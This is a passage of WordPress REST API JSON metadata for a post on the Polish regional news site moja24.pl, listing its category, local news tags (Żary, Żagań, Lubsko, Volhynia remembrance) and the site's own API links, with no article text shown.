[&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5280,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,116,53,146,470,711,58,109,350,376,710,702,471,111,686,68,405,373,374,394,122,73,349],"class_list":["post-5255","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-krzyz-wolynski","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-narodowy-dzien-pamieci-ofiar-ludobojstwa","tag-praca-w-urzedzie-miasta-w-zarach","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5255","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=5255"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5255\/revisions"}],"predecessor-version":[{"id":13158,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5255\/revisions\/13158"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/5280"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=5255"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=5255"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=5255"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}